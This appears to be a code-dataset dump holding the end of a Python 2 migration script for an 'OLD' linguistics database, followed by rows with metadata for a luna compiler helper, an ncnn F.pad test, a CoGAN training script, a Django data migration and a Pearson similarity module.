formbackups = engine.execute(formbackup_table.select()).fetchall()
if default_morphemes:
translations = dict([(row['form_id'], row['transcription']) for row in
engine.execute(translation_table.select().order_by(translation_table.c.id.desc())).fetchall()])
form_update_cache = []
formbackup_update_cache = []
for row in engine.execute(form_table.select()):
values = row2dict(row)
values['UUID'] = str(uuid4())
if default_morphemes and not values['morpheme_break'] and not values['morpheme_gloss'] and ' ' not in values['transcription']:
values['morpheme_break'] = values['transcription']
values['morpheme_gloss'] = translations[values['id']].replace(' ', '.')
backups = sorted([fb for fb in formbackups if fb['form_id'] == row['id']],
key=lambda fb: fb['datetime_modified'])
if backups:
try:
most_recent_backuper = json.loads(backups[-1]['backuper'])['id']
if [u for u in users if u['id'] == most_recent_backuper]:
values['modifier_id'] = most_recent_backuper
else:
values['modifier_id'] = row['enterer_id']
msgs.append('WARNING: there is no user %d to serve as the most recent backuper for form %d' % (most_recent_backuper, row['id']))
except Exception:
msgs.append('''WARNING: there are %d backups for form %d; however,
it was not possible to extract a backuper from the most recent one (backuper value: %s)'''.replace('\n', ' ') % (
len(backups), row['id'], backups[-1]['backuper']))
values['modifier_id'] = row['enterer_id']
else:
values['modifier_id'] = row['enterer_id']
form_update_cache.append(values)
for fb in backups:
formbackup_update_cache.append({'fb_id': fb['id'], 'UUID': values['UUID']})
engine.execute('set names utf8;')
if form_update_cache:
update = form_table.update().where(form_table.c.id==bindparam('id_')).\
values(**dict([(k, bindparam(k)) for k in form_update_cache[0] if k not in ('id', 'id_')]))
engine.execute(update, form_update_cache)
if formbackup_update_cache:
update = formbackup_table.update().where(formbackup_table.c.id==bindparam('fb_id')).values(UUID=bindparam('UUID'))
engine.execute(update, formbackup_update_cache)
print 'done.'
return msgs
def fix_formbackup_table(engine, formbackup_table):
"""Give each form a modifier value and (potentially) a UUID value also (if it doesn't have one)."""
print_('Fixing the formbackup table ... ')
uuidless = {} # maps form ids to UUIDs
buffer1 = []
formbackups = engine.execute(formbackup_table.select()).fetchall()
for row in formbackups:
values = row2dict(row)
backups = sorted([fb for fb in formbackups if fb['form_id'] == values['form_id']],
key=lambda fb: fb['datetime_modified'])
if backups:
most_recent_backuper = backups[-1]['backuper']
values['modifier'] = most_recent_backuper
else:
values['modifier'] = values['enterer']
if values['UUID'] is None:
uuid = uuidless.get(row['form_id'], uuid4())
uuidless[row['form_id']] = uuid
values['UUID'] = uuid
buffer1.append(values)
if buffer1:
engine.execute('set names utf8;')
update = formbackup_table.update().where(formbackup_table.c.id==bindparam('id_')).\
values(modifier=bindparam('modifier'))
engine.execute(update, buffer1)
print 'done.'
def fix_language_table(engine, language_table):
"""Unicode-normalize and UTF-8-ify the data in the language table."""
print_('Fixing the language table ...')
buffer1 = []
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
for row in engine.execute(language_table.select()):
values = row2dict(row)
values['Id_'] = values['Id']
buffer1.append(values)
if buffer1:
engine.execute('set names utf8')
update = language_table.update().where(language_table.c.Id==bindparam('Id_')).\
values(**dict([(k, bindparam(k)) for k in buffer1[0] if k not in ('Id', 'Id_')]))
engine.execute(update, buffer1)
print 'done.'
def fix_translation_table(engine, translation_table):
"""Unicode-normalize and UTF-8-ify the data in the translation table."""
print_('Fixing the translation table ...')
buffer1 = []
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
for row in engine.execute(translation_table.select()):
values = row2dict(row)
buffer1.append(values)
if buffer1:
engine.execute('set names utf8')
update = translation_table.update().where(translation_table.c.id==bindparam('id_')).\
values(**dict([(k, bindparam(k)) for k in buffer1[0] if k not in ('id', 'id_')]))
engine.execute(update, buffer1)
print 'done.'
def fix_page_table(engine, page_table):
print_('Fixing the page table ...')
buffer1 = []
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
for row in engine.execute(page_table.select()):
values = row2dict(row)
values['html'] = rst2html(values['content'])
buffer1.append(values)
if buffer1:
engine.execute('set names utf8')
update = page_table.update().where(page_table.c.id==bindparam('id_')).\
values(**dict([(k, bindparam(k)) for k in buffer1[0] if k not in ('id', 'id_')]))
engine.execute(update, buffer1)
print 'done.'
def fix_phonology_table(engine, phonology_table, phonologybackup_table, user_table):
"""Give each phonology UUID and modifier_id values; also give the phonology backups of
existing phonologies UUID values.
"""
print_('Fixing the phonology table ... ')
msgs = []
#engine.execute('set names latin1')
engine.execute('set names utf8;')
users = engine.execute(user_table.select()).fetchall()
phonologybackups = engine.execute(phonologybackup_table.select()).fetchall()
buffer1 = []
buffer2 = []
for row in engine.execute(phonology_table.select()):
values = row2dict(row)
values['UUID'] = str(uuid4())
backups = sorted([pb for pb in phonologybackups if pb['phonology_id'] == values['id']],
key=lambda pb: pb['datetime_modified'])
if backups:
try:
most_recent_backuper = json.loads(backups[-1]['backuper'])['id']
if [u for u in users if u['id'] == most_recent_backuper]:
values['modifier_id'] = most_recent_backuper
else:
values['modifier_id'] = values['enterer_id']
msgs.append('There is no user %d to serve as the most recent backuper for phonology %d' % (most_recent_backuper, values['id']))
except Exception:
msgs.append('''WARNING: there are %d backups for phonology %d; however,
it was not possible to extract a backuper from the most recent one (backuper value: %s)'''.replace('\n', ' ') % (
len(backups), values['id'], backups[-1]['backuper']))
values['modifier_id'] = values['enterer_id']
else:
values['modifier_id'] = values['enterer_id']
buffer1.append(values)
for pb in backups:
buffer2.append({'pb_id': pb['id'], 'UUID': values['UUID']})
update = phonologybackup_table.update().where(phonologybackup_table.c.id==bindparam('pb_id')).\
values(UUID=bindparam('UUID'))
engine.execute(update, buffer2)
if buffer1:
engine.execute('set names utf8;')
update = phonology_table.update().where(phonology_table.c.id==bindparam('id_')).\
values(modifier_id=bindparam('modifier_id'), UUID=bindparam('UUID'))
engine.execute(update, buffer1)
print 'done.'
return msgs
def fix_phonologybackup_table(engine, phonologybackup_table):
"""Provide each phonology backup with a modifier value and (potentially) a UUID value too."""
print_('Fixing the phonologybackup table ... ')
uuidless = {} # maps phonology ids to UUIDs
buffer1 = []
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
phonologybackups = engine.execute(phonologybackup_table.select()).fetchall()
for row in phonologybackups:
values = row2dict(row)
backups = sorted([pb for pb in phonologybackups if pb['phonology_id'] == values['phonology_id']],
key=lambda pb: pb['datetime_modified'])
if backups:
most_recent_backuper = backups[-1]['backuper']
values['modifier'] = most_recent_backuper
else:
values['modifier'] = row['enterer']
if row['UUID'] is None:
uuid = uuidless.get(row['phonology_id'], uuid4())
uuidless[row['phonology_id']] = uuid
values['UUID'] = uuid
buffer1.append(values)
if buffer1:
engine.execute('set names utf8')
update = phonologybackup_table.update().where(phonologybackup_table.c.id==bindparam('id_')).\
values(UUID=bindparam('UUID'), modifier=bindparam('modifier'))
engine.execute(update, buffer1)
print 'done.'
def fix_tag_table(engine, tag_table):
"""Warn the user about duplicate tags."""
print_('Fixing the tag table ... ')
msgs = []
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
tags = [row['name'] for row in engine.execute(tag_table.select()).fetchall()]
duplicate_tags = set([x for x in tags if len([y for y in tags if y == x]) > 1])
for dt in duplicate_tags:
msgs.append('There is more than one tag named "%s"; please manually change the name of one of them.' % dt)
buffer1 = []
for row in engine.execute(tag_table.select()):
values = row2dict(row)
buffer1.append(values)
if buffer1:
engine.execute('set names utf8')
update = tag_table.update().where(tag_table.c.id==bindparam('id_')).\
values(**dict([(k, bindparam(k)) for k in buffer1[0] if k not in ('id', 'id_')]))
engine.execute(update, buffer1)
print 'done.'
return msgs
def fix_source_table(engine, source_table):
"""Create an author value and put the fullReference value in the annote field.
Return a message explaining what was done.
"""
print_('Fixing the source table ... ')
buffer1 = []
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
for row in engine.execute(source_table.select()):
values = row2dict(row)
first_name = values['authorFirstName']
last_name = values['authorLastName']
if first_name and last_name:
author = '%s %s' % (first_name, last_name)
else:
author = None
values['author'] = author
values['annote'] = values['fullReference']
buffer1.append(values)
if buffer1:
engine.execute('set names utf8;')
update = source_table.update().where(source_table.c.id==bindparam('id_')).\
values(**dict([(k, bindparam(k)) for k in buffer1[0] if k not in ('id', 'id_')]))
engine.execute(update, buffer1)
print 'done.'
return ['''Sources have been updated.
An author value was constructed using the authorFirstName and authorLastName values.
The fullReference value was moved to the annote attribute.
The soures will need to be updated manually.'''.replace('\n', ' ')]
def fix_speaker_table(engine, speaker_table):
"""Generate an html value for each speaker."""
print_('Fixing the speaker table ... ')
buffer1 = []
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
for row in engine.execute(speaker_table.select()):
values = row2dict(row)
values['html'] = rst2html(values['page_content'])
buffer1.append(values)
if buffer1:
engine.execute('set names utf8;')
update = speaker_table.update().where(speaker_table.c.id==bindparam('id_')).\
values(**dict([(k, bindparam(k)) for k in buffer1[0] if k not in ('id', 'id_')]))
engine.execute(update, buffer1)
print 'done.'
def fix_syntacticcategory_table(engine, syntacticcategory_table):
print_('Fixing the syntactic category table ...')
buffer1 = []
#engine.execute('set names latin1;')
engine.execute('set names utf8;')
for row in engine.execute(syntacticcategory_table.select()):
values = row2dict(row)
buffer1.append(values)
if buffer1:
engine.execute('set names utf8')
update = syntacticcategory_table.update().where(syntacticcategory_table.c.id==bindparam('id_')).\
values(**dict([(k, bindparam(k)) for k in buffer1[0] if k not in ('id', 'id_')]))
engine.execute(update, buffer1)
print 'done.'
def cleanup_db(mysql_db_name, mysql_cleanup_script, mysql_updater, mysql_username, mysql_password):
"""Run the MySQL cleanup script against the db (cf. cleanup_SQL for the contents of this script)."""
print_('Cleaning up ... ')
mysql_script_content = '#!/bin/sh\nmysql -u %s -p%s %s < %s' % (mysql_username, mysql_password, mysql_db_name, mysql_cleanup_script)
with open(mysql_updater, 'w') as f:
f.write(mysql_script_content)
with open(os.devnull, 'w') as devnull:
subprocess.call([mysql_updater], shell=False, stdout=devnull, stderr=devnull)
print 'done.'
def getOrthographyReferenced(crappyReferenceString, row, orthographies):
"""Return the id of the orthography model referenced in ``crappyReferenceString``.
``crappyReferenceString`` is something like "Orthography 1" or "Object Language Orthography 3"
and ``row`` is a row in the applicationsettings table. ``orthographies`` is a dict from
orthography names to orthography ids.
"""
orthographyName = row['objectLanguageOrthography%sName' % crappyReferenceString.split()[-1]]
return orthographies.get(orthographyName, None)
def rst2html(string):
"""Covert a restructuredText string to HTML."""
try:
return publish_parts(unicode(string, 'utf8'), writer_name='html',
settings_overrides={'report_level':'quiet'})['html_body'].encode('utf8')
except:
return string
def generateSalt():
return str(uuid4().hex)
def encryptPassword(password, salt):
"""Use PassLib's pbkdf2 implementation to generate a hash from a password.
Cf. http://packages.python.org/passlib/lib/passlib.hash.pbkdf2_digest.html#passlib.hash.pbkdf2_sha512
"""
return pbkdf2_sha512.encrypt(password, salt=salt)
def generatePassword(length=12):
"""Generate a random password containing 3 UC letters, 3 LC ones, 3 digits and 3 symbols."""
lcLetters = string.letters[:26]
ucLetters = string.letters[26:]
digits = string.digits
symbols = string.punctuation.replace('\\', '')
password = [choice(lcLetters) for i in range(3)] + \
[choice(ucLetters) for i in range(3)] + \
[choice(digits) for i in range(3)] + \
[choice(symbols) for i in range(3)]
shuffle(password)
return ''.join(password)
def normalize_(unistr):
"""Return a unistr using decompositional normalization (NFD)."""
try:
return unicodedata.normalize('NFD', unistr)
except TypeError:
return unicodedata.normalize('NFD', unicode(unistr))
except UnicodeDecodeError:
return unistr
def parse_arguments(arg_list):
result = {}
map_ = {'-d': 'mysql_db_name', '-u': 'mysql_username', '-p': 'mysql_password',
'-f': 'mysql_dump_file', '--default-morphemes': 'default_morphemes'}
iterator = iter(arg_list)
try:
for element in iterator:
if element in map_:
if element == '--default-morphemes':
result[map_[element]] = True
else:
result[map_[element]] = iterator.next()
except Exception:
pass
if len(set(['mysql_db_name', 'mysql_username', 'mysql_password']) & set(result.keys())) != 3:
sys.exit('Usage: python old_update_db_0.2.7_1.0ay.py -d mysql_db_name -u mysql_username -p mysql_password [-f mysql_dump_file] [--default-morphemes]')
return result
if __name__ == '__main__':
# User must supply values for mysql_db_name, mysql_username and mysql_password.
# optional argument: -p mysql_dump_file: path to a dump file
# optional argument: --default-morphemes: if present, default morphemes will be generated (see below)
arguments = parse_arguments(sys.argv[1:])
mysql_dump_file = arguments.get('mysql_dump_file')
mysql_db_name = arguments.get('mysql_db_name')
mysql_username = arguments.get('mysql_username')
mysql_password = arguments.get('mysql_password')
default_morphemes = arguments.get('default_morphemes', False)
# The SQLAlchemy/MySQLdb/MySQL connection objects
sqlalchemy_url = 'mysql://%s:%s@localhost:3306/%s' % (mysql_username, mysql_password, mysql_db_name)
engine = create_engine(sqlalchemy_url)
try:
engine.execute('SHOW TABLES;').fetchall()
except Exception:
sys.exit('Error: the MySQL database name, username and password are not valid.')
meta = MetaData()
now = datetime.datetime.utcnow()
now_string = now.isoformat().replace('T', ' ').split('.')[0]
here = os.path.dirname(os.path.realpath(__file__))
# The shell script that will be used multiple times to load the MySQL scripts below
mysql_updater_name = 'tmp.sh'
mysql_updater = write_updater_executable(mysql_updater_name, here)
# The executable that does the preliminary update
mysql_update_script_name = 'old_update_db_0.2.7_1.0a1.sql'
mysql_update_script = write_update_executable(mysql_update_script_name, here)
# The executable that fixes the character set
mysql_charset_script_name = 'old_charset_db_0.2.7_1.0a1.sql'
mysql_charset_script = write_charset_executable(mysql_charset_script_name, here)
# The executable that performs the final clean up
mysql_cleanup_script_name = 'old_cleanup_db_0.2.7_1.0a1.sql'
mysql_cleanup_script = write_cleanup_executable(mysql_cleanup_script_name, here)
# If a dump file path was provided, recreate the db using it.
if mysql_dump_file:
if os.path.isfile(mysql_dump_file):
recreate_database(mysql_db_name, mysql_dump_file, mysql_username, mysql_password, mysql_updater)
else:
sys.exit('Error: there is no such dump file %s' % os.path.join(os.getcwd(), mysql_dump_file))
# Get info about the database
db_charset, table_collations, columns = get_database_info(mysql_db_name, mysql_username, mysql_password)
# Change the character set to UTF-8
change_db_charset_to_utf8(mysql_db_name, mysql_charset_script, mysql_username, mysql_password,
mysql_updater, db_charset, table_collations, columns)
# Perform the preliminary update of the database using ``mysql_update_script``
perform_preliminary_update(mysql_db_name, mysql_update_script, mysql_username, mysql_password, mysql_updater)
# Get info about the database post utf8 conversion
db_charset_new, table_collations_new, columns_new = get_database_info(mysql_db_name, mysql_username, mysql_password)
##################################################################################
# Now we update the values of the newly modified database Pythonically
##################################################################################
applicationsettings_table = Table('applicationsettings', meta, autoload=True, autoload_with=engine)
collection_table = Table('collection', meta, autoload=True, autoload_with=engine)
collectionbackup_table = Table('collectionbackup', meta, autoload=True, autoload_with=engine)
elicitationmethod_table = Table('elicitationmethod', meta, autoload=True, autoload_with=engine)
file_table = Table('file', meta, autoload=True, autoload_with=engine)
form_table = Table('form', meta, autoload=True, autoload_with=engine)
formbackup_table = Table('formbackup', meta, autoload=True, autoload_with=engine)
language_table = Table('language', meta, autoload=True, autoload_with=engine)
orthography_table = Table('orthography', meta, autoload=True, autoload_with=engine)
page_table = Table('page', meta, autoload=True, autoload_with=engine)
phonology_table = Table('phonology', meta, autoload=True, autoload_with=engine)
phonologybackup_table = Table('phonologybackup', meta, autoload=True, autoload_with=engine)
source_table = Table('source', meta, autoload=True, autoload_with=engine)
speaker_table = Table('speaker', meta, autoload=True, autoload_with=engine)
syntacticcategory_table = Table('syntacticcategory', meta, autoload=True, autoload_with=engine)
tag_table = Table('tag', meta, autoload=True, autoload_with=engine)
translation_table = Table('translation', meta, autoload=True, autoload_with=engine)
user_table= Table('user', meta, autoload=True, autoload_with=engine)
messages = []
fix_orthography_table(engine, orthography_table, table_collations['application_settings'])
messages += fix_applicationsettings_table(engine, applicationsettings_table, user_table, now_string, table_collations)
messages += fix_user_table(engine, user_table)
messages += fix_collection_table(engine, collection_table, collectionbackup_table, user_table)
fix_collectionbackup_table(engine, collectionbackup_table)
fix_elicitationmethod_table(engine, elicitationmethod_table)
messages += fix_file_table(engine, file_table)
messages += fix_form_table(engine, form_table, formbackup_table, user_table, default_morphemes)
fix_formbackup_table(engine, formbackup_table)
fix_language_table(engine, language_table)
fix_page_table(engine, page_table)
messages += fix_phonology_table(engine, phonology_table, phonologybackup_table, user_table)
fix_phonologybackup_table(engine, phonologybackup_table)
messages += fix_tag_table(engine, tag_table)
messages += fix_source_table(engine, source_table)
fix_speaker_table(engine, speaker_table)
fix_syntacticcategory_table(engine, syntacticcategory_table)
fix_translation_table(engine, translation_table)
cleanup_db(mysql_db_name, mysql_cleanup_script, mysql_updater, mysql_username, mysql_password)
os.remove(mysql_updater)
print 'OK'
print '\n\n%s' % '\n\n'.join(messages)
print '\nFinally, you should request forms.update_morpheme_references in order to generate valid break_gloss_category values and to regenerate the other morpheme-related values.\n\n'
# TODO: what to do about files without lossy copies? Create an admin-only method of the forms controller that creates
# lossy copies for all relevant files that lack such.
# TODO: make sure that file names match the names of the files on the file system, i.e., post normalization...
# TODO: verify user.input_orthography_id and user.output_orthography_id on an app that has specifications for these
# TODO: search a live OLD app and make sure that the normalization has worked...
# TODO: dump the schema of an altered db and make sure it matches that of a system-generated one (e.g., old_test)
# Post-processing:
# 1. serve the system and request form.update_morpheme_references in order to, well, do that ...
# 2. find all forms and collections that lack enterers and give them a default enterer (cf. the BLA OLD).
# Then find all forms and collections lacking modifiers and give them the value of their enterers.
| [
"[email protected]"
] | |
f6e48ed453acfeacb2bc7ce5b0987480f39bf064 | 225a1d5fca742ae4f502bc346e26d804283e925e | /luna/shortcuts.py | eb802ebf4837f5a06844a562249863d1b76f2dc0 | [
"MIT"
] | permissive | y372465774/luna | 8ad056fdd956c9fa5508d6d3a657b76785e9641d | ee3bb740f2cee67fa84b3e923979d29fd14015a7 | refs/heads/master | 2021-06-21T12:43:09.821262 | 2017-06-03T23:11:47 | 2017-06-03T23:11:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 473 | py | from luna import util
from luna.compiler import Compiler
from luna.parser import Parser
def compile(filepath):
tree = parse(filepath)
compiler = Compiler()
return compiler.compile(tree)
def interpret(filepath):
frame = compile(filepath)
frame.run()
def parse(filepath):
import os
content = filepath
if os.path.isfile(filepath):
content = util.read(filepath)
parser = Parser()
return parser.parse_with_rule(None, content)
| [
"[email protected]"
] | |
d2e678f126fa9f4a2b06d9a9db003b86dc26c0cb | d668209e9951d249020765c011a836f193004c01 | /tools/pnnx/tests/ncnn/test_F_pad.py | 88590649883cbbc978a447b89328a1e6e6372751 | [
"BSD-3-Clause",
"Zlib",
"BSD-2-Clause"
] | permissive | Tencent/ncnn | d8371746c00439304c279041647362a723330a79 | 14b000d2b739bd0f169a9ccfeb042da06fa0a84a | refs/heads/master | 2023-08-31T14:04:36.635201 | 2023-08-31T04:19:23 | 2023-08-31T04:19:23 | 95,879,426 | 18,818 | 4,491 | NOASSERTION | 2023-09-14T15:44:56 | 2017-06-30T10:55:37 | C++ | UTF-8 | Python | false | false | 2,062 | py | # Tencent is pleased to support the open source community by making ncnn available.
#
# Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
#
# Licensed under the BSD 3-Clause License (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
import torch
import torch.nn as nn
import torch.nn.functional as F
class Model(nn.Module):
def __init__(self):
super(Model, self).__init__()
def forward(self, x, y, z):
x = F.pad(x, (3,4), mode='constant', value=1.3)
x = F.pad(x, (2,2))
y = F.pad(y, (5,6), mode='reflect')
y = F.pad(y, (2,1), mode='replicate')
y = F.pad(y, (3,4), mode='constant', value=1.3)
y = F.pad(y, (1,1))
z = F.pad(z, (3,4,3,4), mode='reflect')
z = F.pad(z, (2,1,2,0), mode='replicate')
z = F.pad(z, (1,0,2,0), mode='constant', value=1.3)
z = F.pad(z, (3,3,3,3))
return x, y, z
def test():
net = Model()
net.eval()
torch.manual_seed(0)
x = torch.rand(1, 16)
y = torch.rand(1, 2, 16)
z = torch.rand(1, 3, 12, 16)
a = net(x, y, z)
# export torchscript
mod = torch.jit.trace(net, (x, y, z))
mod.save("test_F_pad.pt")
# torchscript to pnnx
import os
os.system("../../src/pnnx test_F_pad.pt inputshape=[1,16],[1,2,16],[1,3,12,16]")
# ncnn inference
import test_F_pad_ncnn
b = test_F_pad_ncnn.test_inference()
for a0, b0 in zip(a, b):
if not torch.allclose(a0, b0, 1e-4, 1e-4):
return False
return True
if __name__ == "__main__":
if test():
exit(0)
else:
exit(1)
| [
"[email protected]"
] | |
ed20f0ff5ef0931674df3d3cb706768578fb1f47 | 28225a61f2fc33e4f6d56a1941a99301489c0f1e | /GAN/CoGAN(WIP)/main.py | 34036d03559776a7b713da6c23fac7aa13909638 | [] | no_license | sailfish009/pytorchTutorialRepo | 97cb4368b6ac22bd678965d351196b47d52970e1 | 17d67e64555d2b219d7d53de6a7bfda4172b809b | refs/heads/master | 2023-03-08T13:03:57.244087 | 2021-02-23T11:26:19 | 2021-02-23T11:26:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,696 | py | import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
from torch.optim.lr_scheduler import StepLR
from tqdm import tqdm
from trainer import *
import torchvision.models as models
import mnistm
import os
os.environ["TORCH_HOME"] = "~/Desktop/Datasets/"
# Allowing arguments for direct execution from terminal
parser = argparse.ArgumentParser()
parser.add_argument('--data', help = "folder for custom training", default = "")
parser.add_argument('--arch', default = 'resnet18', help= '''Choose any model
from pytorch. Or input "my" for taking a model from
model.py ''')
parser.add_argument("--weight-decay", default = 1e-4, help = "weight decay coefficient")
parser.add_argument("--resume", default = False, help = "Resume training from a checkpoint")
parser.add_argument("--pretrained", default = False, help = "If part of the standard datasets, downloaded pretrained weights")
parser.add_argument('--batch-size', type = int, default = 128, help = 'input batch size')
parser.add_argument(
"--test-batch-size", type = int, default = 1000
)
parser.add_argument(
"--epochs", type = int, default = 20, help = "no of epochs to train for"
)
parser.add_argument(
"--lr", type = float, default = 0.01, help = "Base learning rate"
)
parser.add_argument(
"--max_lr", type = float, default = 0.1, help = "Max learning rate for OneCycleLR"
)
parser.add_argument(
"--dry-run", action = 'store_true', default = False, help = 'quickly check a single pass'
)
parser.add_argument(
"--seed", type = int, default = 100, help = "torch random seed"
)
parser.add_argument(
"--log_interval", type = int, default = 20, help = "interval to show results"
)
parser.add_argument(
"--save-model", action = 'store_true', default = True, help = "Choose if model to be saved or not"
)
parser.add_argument("--save_path", default = "models/model.pt", help = "Choose model saved filepath")
# GAN specific args
parser.add_argument("--nz", default = 100, help = "size of latent vector")
parser.add_argument("--ngf", default = 28, help = "gen size")
parser.add_argument("--ndf", default = 28, help= "Discriminator size")
parser.add_argument("--beta1", default = 0.5, help = "adam beta1 parameter")
parser.add_argument('--CRITIC_ITERS', default=1, type=int, help='D update iters before G update')
parser.add_argument("--nc", default =1, help = "number of image channels")
args = parser.parse_args()
# Setting params
nz = int(args.nz)
nsamplesgf = int(args.ngf)
ndf = int(args.ndf)
nc = int(args.nc)
torch.manual_seed(args.seed)
device = torch.device("cuda")
kwargs = {'batch_size':args.batch_size}
kwargs.update(
{'num_workers':8,
'pin_memory':True,
'shuffle': True
}
)
# Defining batch transforms
transform = transforms.Compose(
[transforms.Resize(28),
transforms.ToTensor(),
transforms.Normalize([0.5], [0.5])
# transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
]
)
# Loading dataset
train_data = datasets.MNIST("~/Desktop/Datasets/", transform =
transform)
train_loader = torch.utils.data.DataLoader(train_data, **kwargs)
train_loader2 = torch.utils.data.DataLoader(
mnistm.MNISTM(
"~/Desktop/Datasets/",
train=True,
download=True,
transform=transforms.Compose(
[
transforms.Resize(ndf),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
]
),
),
batch_size=args.batch_size,
shuffle=True,
)
# Initialize weights
def weight_init(m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
torch.nn.init.normal_(m.weight, 0.0, 0.02)
elif classname.find('BatchNorm') != -1:
torch.nn.init.normal_(m.weight, 1.0, 0.02)
torch.nn.init.zeros_(m.bias)
# Loading model
num_classes = 10 #This is new; change it based on dataset
if args.arch == "my":
from Nets import *
netG = Generator(num_classes, (nc, ndf, ndf), args).to(device)
netG.apply(weight_init)
netD = Discriminator(num_classes, (nc, ndf, ndf), args).to(device)
netD.apply(weight_init)
print("Using custom architecture")
else:
if args.pretrained:
print(f"Using pretrained {args.arch}")
model = models.__dict__[args.arch](pretrained = True)
else:
print(f"Not using pretrained {args.arch}")
model = models.__dict__[args.arch]()
print("Generator", netG)
print("Discriminator", netD)
start_epoch = 1
if args.resume:
loc = "cuda:0"
checkpointD = torch.load(args.save_path+"dis.pt", map_location = loc)
checkpointG = torch.load(args.save_path+"gen.pt", map_location = loc)
netD.load_state_dict(checkpoint['state_dict'])
netD.load_state_dict(checkpoint['optimizer'])
netG.load_state_dict(checkpoint['state_dict'])
netG.load_state_dict(checkpoint['optimizer'])
start_epoch = checkpoint['epoch']
print(f"Done loading pretrained, Start epoch: {checkpoint['epoch']}")
# Optimizers
optimizerD = optim.Adam(netD.parameters(), lr=args.lr,betas=(args.beta1, 0.999))
optimizerG = optim.Adam(netG.parameters(), lr=args.lr,betas=(args.beta1, 0.999))
# Loop
batches_done = 0
for epoch in tqdm(range(start_epoch, args.epochs+1)):
train(args, device, train_loader,train_loader2, epoch, netD, netG,nz , ndf, nc, optimizerD, optimizerG, batches_done, num_classes)
if args.save_model:
torch.save(netD.state_dict(), args.save_path+"disc.pt")
torch.save(netG.state_dict(), args.save_path+"gen.pt")
| [
"[email protected]"
] | |
9bcc59034c881a3c1b6c4c6e4be0b400fa0191b6 | d8da64ecb3a88f8f3196937d3836c7bbafd5e26f | /backend/home/migrations/0002_load_initial_data.py | 5ac5736cbfb33d2462efd03c2c2be03900aba58d | [] | no_license | crowdbotics-apps/layouteditor151-1654 | 990b395d8054e05b0f8739345d5e55623cead88c | 75e3614856ab5577da68e9ec4ad0157f462abd6d | refs/heads/master | 2022-11-16T05:09:59.518254 | 2020-07-03T17:54:23 | 2020-07-03T17:54:23 | 276,958,333 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,313 | py | from django.db import migrations
def create_customtext(apps, schema_editor):
CustomText = apps.get_model("home", "CustomText")
customtext_title = "layouteditor151"
CustomText.objects.create(title=customtext_title)
def create_homepage(apps, schema_editor):
HomePage = apps.get_model("home", "HomePage")
homepage_body = """
<h1 class="display-4 text-center">layouteditor151</h1>
<p class="lead">
This is the sample application created and deployed from the Crowdbotics app.
You can view list of packages selected for this application below.
</p>"""
HomePage.objects.create(body=homepage_body)
def create_site(apps, schema_editor):
Site = apps.get_model("sites", "Site")
custom_domain = "layouteditor151-1654.botics.co"
site_params = {
"name": "layouteditor151",
}
if custom_domain:
site_params["domain"] = custom_domain
Site.objects.update_or_create(defaults=site_params, id=1)
class Migration(migrations.Migration):
dependencies = [
("home", "0001_initial"),
("sites", "0002_alter_domain_unique"),
]
operations = [
migrations.RunPython(create_customtext),
migrations.RunPython(create_homepage),
migrations.RunPython(create_site),
]
| [
"[email protected]"
] | |
119c672f5d02ac1dc65310e156c212718e05ac89 | d838bed08a00114c92b73982a74d96c15166a49e | /docs/data/learn/Bioinformatics/output/ch8_code/src/metrics/PearsonSimilarity.py | aae4c9870689ccc0776b67c2e785b313c5e05669 | [] | no_license | offbynull/offbynull.github.io | 4911f53d77f6c59e7a453ee271b1e04e613862bc | 754a85f43159738b89dd2bde1ad6ba0d75f34b98 | refs/heads/master | 2023-07-04T00:39:50.013571 | 2023-06-17T20:27:05 | 2023-06-17T23:27:00 | 308,482,936 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,725 | py | from math import sqrt
from statistics import mean
from sys import stdin
from typing import Sequence
import yaml
# MARKDOWN
def pearson_similarity(v: Sequence[float], w: Sequence[float], dims: int):
v_avg = mean(v)
w_avg = mean(w)
vec_avg_diffs_dp = sum((v[i] - v_avg) * (w[i] - w_avg) for i in range(dims))
dist_to_v_avg = sqrt(sum((v[i] - v_avg) ** 2 for i in range(dims)))
dist_to_w_avg = sqrt(sum((w[i] - w_avg) ** 2 for i in range(dims)))
return vec_avg_diffs_dp / (dist_to_v_avg * dist_to_w_avg)
def pearson_distance(v: Sequence[float], w: Sequence[float], dims: int):
# To turn pearson similarity into a distance metric, subtract 1.0 from it. By
# subtracting 1.0, you're changing the bounds from [1.0, -1.0] to [0.0, 2.0].
#
# Recall that any distance metric must return 0 when the items being compared
# are the same and increases the more different they get. By subtracting 1.0,
# you're matching that distance metric requirement: 0.0 when totally similar
# and 2.0 for totally dissimilar.
return 1.0 - pearson_similarity(v, w, dims)
# MARKDOWN
def main():
print("<div style=\"border:1px solid black;\">", end="\n\n")
print("`{bm-disable-all}`", end="\n\n")
try:
data = yaml.safe_load(stdin)
v = data[0]
w = data[1]
dims = max(len(v), len(w))
print('Given the vectors ...')
print()
print(f' * {v}')
print(f' * {w}')
print()
d = pearson_similarity(v, w, dims)
print(f'Their pearson similarity is {d}')
print()
finally:
print("</div>", end="\n\n")
print("`{bm-enable-all}`", end="\n\n")
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
1c77dba5905a2cb966626324f46fa89f88fbd802 | e8c31e1c1e667429509783682fc1d4da8ad816e7 | /exec -l /bin/bash/google-cloud-sdk/lib/googlecloudsdk/third_party/apis/pubsub/v1/pubsub_v1_messages.py | 875964c1532fd14fbfebbcd91aa8a80009d46674 | [
